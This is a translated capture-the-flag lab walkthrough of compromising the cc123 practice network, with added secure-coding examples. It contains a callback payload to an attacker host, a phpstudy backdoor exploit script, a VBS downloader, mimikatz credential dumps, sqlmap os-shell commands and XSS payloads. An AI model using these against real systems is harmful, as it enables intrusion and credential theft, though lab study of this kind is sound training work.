[Original] A Complete Penetration Test Walkthrough


This PDF is a technical write-up, so the process may not be covered in full detail. If you are interested in this area you can join the Moonsec WEB security training, where I explain every detail. Training site: http://edu.moonsec.com
1. cc123 lab introduction
This lab has four flags. Import the downloaded virtual machine into your hypervisor; the network environment must be configured correctly for this lab.
1.1. Network diagram

2. Information gathering
2.1. Host discovery
sudo netdiscover -i eth0 -r 192.168.0.0/24

2.2. masscan port scan
sudo masscan -p 1-65535 192.168.0.134 --rate=1000

2.3. nmap port and service detection
nmap -sC -A 192.168.0.134 -p 80,53,49154,6588,3389,135,21,51464,999 -oA cc123-port

2.4. Website information
http://192.168.0.134:6588/

http://192.168.0.134:999/

3. Local settings
3.1. Bind the local hosts file
C:\Windows\System32\drivers\etc\hosts
192.168.0.134 www.cc123.com
3.2. Set the local gateway

sudo vi /etc/resolv.conf

4. Subdomain enumeration
4.1. Enumerate subdomains with wfuzz
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53

5. Subdomain information
CMS       | Subdomain
dedecms   | new.cc123.com
KesionEDU | www.cc123.com
.net      | ww2.cc123.com
6. Vulnerability testing
6.1. dedecms security check
Testing showed that the member system at http://new.cc123.com/member/ is open. After registering a member account:

the dedecms version is 20150618, which has an SQL injection vulnerability.

Ciphertext 812df726be884ddcfc41 decrypts to: admin7788

Upload a one-line webshell through the file manager in the admin backend at http://new.cc123.com/dede/
Connect to it with AntSword (中国蚁剑)

7. Privilege escalation on the server
Executing commands from the webshell terminal failed

Upload ASPXSpy2014: http://new.cc123.com/a/ASPXSpy2014.aspx

7.1. Windows privilege escalation with Metasploit
Generate the payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=12345 -f exe >s.exe

Metasploit listener
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.109
lhost => 192.168.0.109
msf5 exploit(multi/handler) > set lport 12345
lport => 12345
msf5 exploit(multi/handler) > exploit
7.2. Scan for writable directories

7.3. Obtain a meterpreter session

7.4. Check for exploitable privilege escalation vulnerabilities
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1

[*] 192.168.0.134 - Collecting local exploits for x86/windows...
[*] 192.168.0.134 - 29 exploit checks are being tried...
[+] 192.168.0.134 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 192.168.0.134 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
7.5. Privilege escalation with ms16_075
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > set SESSION 1
msf5 exploit(windows/local/ms16_075_reflection_juicy) > exploit

8. Obtaining the flags
8.1. The first flag

8.2. The second flag

9. Testing the security of ww2.cc123.com
9.1. gobuster directory scan
gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "aspx,html" -o ww2dir

http://ww2.cc123.com/admin   admin backend
http://ww2.cc123.com/editor  editor
Testing showed the backend password is cc123
9.2. Testing for injection with SQLMAP
Capture a request from one of the backend pages with a proxy
GET /admin/aboutadd.aspx?id=7&pid=6 HTTP/1.1
Host: ww2.cc123.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://ww2.cc123.com/admin/aboutlist.aspx?pid=6
Cookie: CheckCode=266V; ASP.NET_SessionId=2bij0yxlearbaymq5yspvzc3
Upgrade-Insecure-Requests: 1
Test for injection
sqlmap -r cc123 --dbms mssql -v 1 --batch

List the databases
sqlmap -r cc123 --dbms mssql -v 1 --dbs

Get an MSSQL os-shell
sqlmap -r cc123 --dbms mssql -v 1 --os-shell

IP information and user privileges

9.3. SQL Server host information
hostname returns the server name WIN-JJU7KU45PN7
NIC information
Windows IP 配置
以太网适配器 本地连接 2:
连接特定的 DNS 后缀 . . . . . . . : localdomain
本地链接 IPv6 地址. . . . . . . . : fe80::c016:f9b9:6daa:7d73
IPv4 地址 . . . . . . . . . . . . : 10.10.1.128
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . : localdomain
本地链接 IPv6 地址. . . . . . . . : fe80::ec7d:88c4:723a:e954
These are internal IPs; the site and the database are probably on separate hosts.
9.4. The third flag
type C:\Users\Administrator\root.txt.txt

9.5. .NET code audit
c:\HwsHostMaster\wwwroot\ww2cc123_55m39g\web\bin>dir

Download the files
download c:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web/bin

9.5.1. Decompile the DLL
Load the DLL you want to decompile into ILSpy

9.5.2. CAPTCHA reuse vulnerability
// Decompiled login handler from the site's DLL (shown as found, not fixed)
protected void ImageButton1_Click(object sender, ImageClickEventArgs e)
{
    // The expected CAPTCHA value is read back from a client-controlled cookie,
    // so a single known CheckCode cookie can be replayed for every login attempt.
    if (!(base.Request.Cookies["CheckCode"].Value == this.safecode.Text.Trim().ToUpper()))
    {
        base.Response.Write("<script>alert('验证码输入错误!');javascript:history.back(-1);</script>");
        return;
    }
    // The username is concatenated straight into the query text: SQL injection.
    // The password is "encrypted" with a hard-coded DES key and compared as a string.
    string sql = string.Concat(new string[]
    {
        "select*from admin where username='",
        this.username.Text.Trim(),
        "' and password='",
        StringClass.Encrypt(this.password.Text.Trim(), "yx139222"),
        "'"
    });
    DataSet tableData = DBClass.GetTableData(sql, "admin");
    if (tableData != null && tableData.Tables["admin"].Rows.Count > 0)
    {
        this.Session["users"] = this.username.Text.Trim();
        base.Response.Redirect("index.aspx");
        return;
    }
    base.Response.Write("<script>alert('姓名或密码输入错误!');javascript:history.back(-1);</script>");
}
Verifying the vulnerability

9.5.3. SQL injection in the admin backend

Verify the vulnerability

9.5.4. Every backend page has SQL injection

None of the values passed to the backend pages are filtered, so every one of them is injectable.
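The following is an added example, not the site's decompiled code: the same login handler rewritten so the CAPTCHA lives in the server session and is consumed once, and the username reaches SQL Server as a parameter rather than as query text. It assumes the same Web Forms control names (safecode, username, password), a connection string named "grcms" in web.config, a 50-character username column, and a hypothetical PasswordStore.Verify salted-hash check in place of StringClass.Encrypt.

```csharp
// Added example: hardened version of ImageButton1_Click (assumptions noted above).
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;
using System.Web.UI.WebControls;

public partial class Login : Page
{
    // The handler that renders the CAPTCHA image must put the expected text in
    // Session["CheckCode"]; the client never sees the expected value.
    protected void ImageButton1_Click(object sender, ImageClickEventArgs e)
    {
        string expected = Session["CheckCode"] as string;
        Session.Remove("CheckCode");          // one-time use: a replayed code no longer matches
        string entered = safecode.Text.Trim().ToUpper();
        if (string.IsNullOrEmpty(expected) ||
            !string.Equals(expected, entered, StringComparison.Ordinal))
        {
            Response.Write("<script>alert('验证码输入错误!');history.back(-1);</script>");
            return;
        }

        // Parameterised lookup: the username is bound as data, so quotes in it
        // cannot change the statement. Only the stored hash is fetched.
        string cs = ConfigurationManager.ConnectionStrings["grcms"].ConnectionString;
        string storedHash;
        using (var conn = new SqlConnection(cs))
        using (var cmd = new SqlCommand("SELECT password FROM admin WHERE username = @u", conn))
        {
            cmd.Parameters.Add("@u", SqlDbType.NVarChar, 50).Value = username.Text.Trim();
            conn.Open();
            storedHash = cmd.ExecuteScalar() as string;
        }

        // PasswordStore.Verify (assumed helper) checks a salted, one-way hash;
        // the reversible DES value the site used cannot be compared this way.
        if (storedHash != null && PasswordStore.Verify(password.Text, storedHash))
        {
            Session["users"] = username.Text.Trim();
            Response.Redirect("index.aspx");
            return;
        }
        Response.Write("<script>alert('姓名或密码输入错误!');history.back(-1);</script>");
    }
}
```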

9.5.5. Upload vulnerability in the backend editor
The site uses KindEditor, which has an upload vulnerability
POST /editor/asp.net/upload_json.ashx?dir=file HTTP/1.1
Host: ww2.cc123.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------94606993523768564143156227113
Content-Length: 388
Origin: http://ww2.cc123.com
Connection: close
Referer: http://ww2.cc123.com/admin/aboutadd.aspx?pid=1
Cookie: CheckCode=8XZ0; ASP.NET_SessionId=2bij0yxlearbaymq5yspvzc3
Upgrade-Insecure-Requests: 1
-----------------------------94606993523768564143156227113
Content-Disposition: form-data; name="localUrl"
C:\fakepath\2.html
-----------------------------94606993523768564143156227113
Content-Disposition: form-data; name="imgFile"; filename="2.html"
Content-Type: text/html
<script>alert(document.cookie)</script>
-----------------------------94606993523768564143156227113--
Process


Opening the uploaded file pops the cookie
9.5.6. Front-end XSS
<%@ page language="c#" runat="server" %>
<script language="c#" runat="server">
    public string strStyle;
    public string strtheurl;
    public void Page_Load(Object src, EventArgs e)
    {
        NameValueCollection ServerVariables = Request.ServerVariables;
        strStyle = Request.QueryString["style"];
        strtheurl = ServerVariables["URL"].ToString();
        strtheurl = strtheurl.Substring(0, strtheurl.IndexOf("mystat.aspx", 0, strtheurl.Length));
        strtheurl = "http://" + ServerVariables["HTTP_HOST"].ToString() + strtheurl;
    }
</script>
document.write("<script>var style='<%=strStyle%>';var url='<%=strtheurl%>';</script>")
_dwrite("<script language=javascript src="+url+"stat.aspx?style="+style+"&referer="+escape(document.referrer)+"&screenwidth="+(screen.width)+"></script>");
function _dwrite(string) {document.write(string);}
The query-string value is written out directly, so there is an XSS vulnerability:
document.write("<script>var style='<%=strStyle%>';var url='<%=strtheurl%>';</script>")
Verification: http://ww2.cc123.com/mystat.aspx?style=%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E%3Cscript%3E
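An added example, not the site's code: the two values mystat.aspx interpolates into its inline script, encoded for a JavaScript string context with System.Web's HttpUtility.JavaScriptStringEncode. The class and method names are assumptions; the self-check uses the payload from the verification URL above.

```csharp
// Added example: JavaScript-string encoding for the mystat.aspx inline script.
using System;
using System.Web;

public static class StatScript
{
    // JavaScriptStringEncode escapes quotes, backslashes, '<', '>' and '&' as
    // \uXXXX sequences, so a value can neither close the single-quoted string
    // literal nor inject "</script>" to terminate the script element.
    public static string EncodeForScript(string value)
    {
        return HttpUtility.JavaScriptStringEncode(value ?? string.Empty);
    }

    // The same <script> block mystat.aspx emits, built from encoded values.
    public static string BuildInlineScript(string style, string baseUrl)
    {
        return "<script>var style='" + EncodeForScript(style) +
               "';var url='" + EncodeForScript(baseUrl) + "';</script>";
    }

    // Self-check with the payload from section 9.5.6: the markup must contain
    // neither the raw payload nor a "</script><script>" sequence.
    public static bool PayloadStaysInert()
    {
        string payload = "</script><script>alert(/xss/)</script><script>";
        string html = BuildInlineScript(payload, "http://ww2.cc123.com/");
        return html.IndexOf(payload, StringComparison.Ordinal) < 0
            && html.IndexOf("</script><script>", StringComparison.Ordinal) < 0;
    }
}
```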

9.6. Decrypting the backend user password ciphertext
sqlmap commands
Get the tables of the grcms_data database
sqlmap -r cc123 --dbms mssql -v 1 --tables -D grcms_data
Dump the whole admin table
sqlmap -r cc123 --dbms mssql -v 1 --dump -T admin -D grcms_data

No values could be retrieved this way
Find the database connection string in web.config and query the content directly
value="server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123.." />

admin AE5F6187F32825CA
cc123 B97C57DB005F954242450A255217DA9F
9.7. Locating the decryption routine
Decompiling the login page's code usually reveals the encryption function

The encryption function's key is yx139222

The decryption function

9.8. Writing a decryption tool in C#
Open VS2012 and create a new project targeting .NET 4.5

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace WindowsFormsApplication2
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        // Mirrors the site's StringClass routine: single DES with the 8-byte key
        // also used as the IV, ciphertext supplied as a hex string.
        public static string Decrypt(string pToDecrypt, string sKey)
        {
            DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider();
            // Convert the hex string (two characters per byte) into raw bytes
            byte[] array = new byte[pToDecrypt.Length / 2];
            for (int i = 0; i < pToDecrypt.Length / 2; i++)
            {
                int num = Convert.ToInt32(pToDecrypt.Substring(i * 2, 2), 16);
                array[i] = (byte)num;
            }
            dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey);
            dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey);
            MemoryStream memoryStream = new MemoryStream();
            CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Write);
            cryptoStream.Write(array, 0, array.Length);
            cryptoStream.FlushFinalBlock();
            return Encoding.Default.GetString(memoryStream.ToArray());
        }

        // textBox1: hex ciphertext, textBox2: key, textBox3: recovered plaintext
        private void button1_Click(object sender, EventArgs e)
        {
            string passwd = textBox1.Text.Trim();
            string key = textBox2.Text.Trim();
            textBox3.Text = Decrypt(passwd, key);
        }
    }
}
Drag a few controls onto the form, build, and run


admin cc123
cc123 qweasd123
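The stored values could be recovered above because the site "encrypts" passwords with DES under a fixed key that also serves as the IV, so anyone holding the DLL can reverse every row. As an added example, not the site's code, this is the one-way replacement: a per-user random salt and PBKDF2 via .NET's Rfc2898DeriveBytes, with a constant-time comparison on verify. The class name, the "pbkdf2$" record format and the iteration count are assumptions.

```csharp
// Added example: salted PBKDF2 password storage in place of reversible DES.
using System;
using System.Security.Cryptography;

public static class PasswordStore
{
    const int SaltBytes = 16, HashBytes = 32, Iterations = 100000;

    // Returns "pbkdf2$<iterations>$<salt>$<hash>". A fresh random salt each time
    // means two admins with the same password no longer share a stored value.
    public static string Hash(string password)
    {
        byte[] salt = new byte[SaltBytes];
        using (var rng = new RNGCryptoServiceProvider()) rng.GetBytes(salt);
        byte[] hash;
        using (var kdf = new Rfc2898DeriveBytes(password, salt, Iterations))
            hash = kdf.GetBytes(HashBytes);
        return "pbkdf2$" + Iterations + "$" + Convert.ToBase64String(salt) +
               "$" + Convert.ToBase64String(hash);
    }

    // Recomputes the hash from the stored salt and iteration count; nothing
    // here can be run backwards to a plaintext the way Decrypt() above can.
    public static bool Verify(string password, string stored)
    {
        string[] parts = stored.Split('$');
        if (parts.Length != 4 || parts[0] != "pbkdf2") return false;
        int iterations = int.Parse(parts[1]);
        byte[] salt = Convert.FromBase64String(parts[2]);
        byte[] expected = Convert.FromBase64String(parts[3]);
        byte[] actual;
        using (var kdf = new Rfc2898DeriveBytes(password, salt, iterations))
            actual = kdf.GetBytes(expected.Length);
        // Constant-time comparison: no early exit on the first differing byte
        int diff = 0;
        for (int i = 0; i < expected.Length; i++) diff |= expected[i] ^ actual[i];
        return diff == 0;
    }
}
```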
10. Multi-segment internal network penetration
10.1. Web server information gathering
10.1.1. NIC information
ifconfig

There are two IPs:
192.168.0.134
10.10.10.135
10.1.2. Routing information
meterpreter > run get_local_subnets

Two subnets:
10.10.10.0
192.168.0.0
10.1.3. Obtaining hashes
meterpreter > run hashdump

10.1.4. Obtaining plaintext credentials with mimikatz
load mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
wdigest
tspkg

Host            User           Password
WIN-KALKEMT3JMA Administrator  !@#Qwe123.
WIN-KALKEMT3JMA cc123          Ht6_ifp6nvkjn
WIN-KALKEMT3JMA newcc123       ZtKGmDj0qEbDECSBl5p
WIN-KALKEMT3JMA ww2cc123       xwSggtdWvl42JGHivMX
10.1.5. Add a route for internal network penetration
meterpreter > run autoroute -s 10.10.10.0/24

10.1.6. Start a SOCKS proxy
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
msf5 auxiliary(server/socks4a) > options
msf5 auxiliary(server/socks4a) > run
10.1.7. Configure proxychains
Edit the configuration file: sudo vim /etc/proxychains.conf
socks4 127.0.0.1 2222

10.1.8. Run nmap through proxychains

Output like this means the configuration works; other tools can then be run through the proxy against the internal network.
10.2. Database server information gathering
10.2.1. NIC and port information
Run netstat -ano in the os-shell to list the ports
协议 本地地址 外部地址 状态 PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 1192
TCP 0.0.0.0:2383 0.0.0.0:0 LISTENING 1224
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 376
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 752
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 492
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 852
TCP 0.0.0.0:49162 0.0.0.0:0 LISTENING 484
TCP 0.0.0.0:49163 0.0.0.0:0 LISTENING 256
TCP 10.10.1.128:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.134:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.134:1433 10.10.10.135:56314 ESTABLISHED 1192
TCP 10.10.10.134:1433 10.10.10.135:56315 ESTABLISHED 1192
TCP 10.10.10.134:1433 10.10.10.135:56397 ESTABLISHED 1192
TCP 10.10.10.134:1433 10.10.10.135:56398 ESTABLISHED 1192
TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 1192
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 700
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1433 [::]:0 LISTENING 1192
TCP [::]:2383 [::]:0 LISTENING 1224
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 376
TCP [::]:49153 [::]:0 LISTENING 752
TCP [::]:49154 [::]:0 LISTENING 492
TCP [::]:49155 [::]:0 LISTENING 852
TCP [::]:49162 [::]:0 LISTENING 484
TCP [::]:49163 [::]:0 LISTENING 256
TCP [::1]:1434 [::]:0 LISTENING 1192
UDP 0.0.0.0:123 *:* 936
UDP 0.0.0.0:500 *:* 852
UDP 0.0.0.0:4500 *:* 852
UDP 0.0.0.0:5355 *:* 1020
UDP 10.10.1.128:137 *:* 4
UDP 10.10.1.128:138 *:* 4
UDP 10.10.10.134:137 *:* 4
NIC information: the same ipconfig output as in section 9.3 (10.10.1.128 on the second adapter).
10.2.2. Generate a bind (forward-connect) payload
msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 10.10.10.134
set lport 13777
10.2.3. Upload bind.exe to the web server

10.2.4. Write a VBS downloader on the database server
This file downloads a file. Mind the spaces, otherwise the download fails.
echo iLocal = LCase(WScript.Arguments(1)) >C:/l.vbs
echo iRemote = LCase(WScript.Arguments(0))>>C:/l.vbs
echo Set xPost = CreateObject("Microsoft.XMLHTTP")>>C:/l.vbs
echo xPost.Open "GET",iRemote,0>>C:/l.vbs
echo xPost.Send()>>C:/l.vbs
echo Set sGet = CreateObject("ADODB.Stream")>>C:/l.vbs
echo sGet.Mode = 3 >>C:/l.vbs
echo sGet.Type = 1 >>C:/l.vbs
echo sGet.Open()>>C:/l.vbs
echo sGet.Write(xPost.responseBody)>>C:/l.vbs
echo sGet.SaveToFile iLocal,2 >>C:/l.vbs

Execution failed

10.2.5. Upload the file via MSSQL

10.2.6. Execute the file and get a session
Listen with a bind (forward) connection
msf5 auxiliary(server/socks4a) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set RHOST 10.10.10.134
msf5 exploit(multi/handler) > set lport 13777
lport => 13777
msf5 exploit(multi/handler) > run

10.2.7. Migrate the process

10.2.8. Load mimikatz to get plaintext credentials

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate WORKGROUP WIN-JJU7KU45PN7$
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;50405 NTLM
0;999 NTLM WORKGROUP WIN-JJU7KU45PN7$
0;917832 NTLM WIN-JJU7KU45PN7 Administrator !@#QWEasd123.
Plaintext obtained: Administrator !@#QWEasd123.
10.3. Penetrating the target server
10.3.1. Add a route
The target host is in the 10.10.1.0 segment
run autoroute -s 10.10.1.0/24

10.3.2. Port probing


Host is up (1.1s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
10.3.3. Testing for the phpstudy backdoor
Port 80 shows phpstudy

10.3.4. Writing a phpstudy backdoor exploit in Python
# coding: utf-8
import requests
import re
import sys
import base64

# The command to run is taken from argv[1] and wrapped in a PHP system() call,
# then base64-encoded and sent in the accept-charset header
shell = "system('" + sys.argv[1] + "');"
shell1 = base64.b64encode(shell.encode('utf-8'))
#shell1 = "ZmlsZV9wdXRfY29udGVudHMlMjglMjdtb29uJTI3JTJDJTI3JTNDJTNGcGhwJTIwZXZhbCUyOCUyNF9QT1NUJTVCJTIybW9vbiUyMiU1RCUyOSUzQiUzRiUzRSUyNyUyOSUzQg=="
header = {'accept-charset': shell1, 'Accept-Encoding': 'gzip,deflate'}

def exploit(url):
    html = requests.get(url=url, headers=header).text
    return html

print(exploit('http://10.10.1.129/'))
Write the shell
proxychains3 python3 phpstudy.py "echo ^>c:\phpstudy\WWW\shell.php"
10.3.5. Access the backdoor

10.3.6. Configure a local proxy with SocksCap64
Use the proxy configured in Kali's /etc/proxychains.conf


10.3.7. Get a session on the target host
Upload bind.exe to the target and execute it
Metasploit connects forward to the target
msf5 exploit(multi/handler) > set rhost 10.10.1.129
rhost => 10.10.1.129
msf5 exploit(multi/handler) > show options
   LPORT  13777        yes  The listen port
   RHOST  10.10.1.129  no   The target address

The target host has been compromised.
10.3.8. The last flag

12. Full PDF download
Original article by moonsec. If reposting, please credit the source: https://www.moonsec.com/1745.html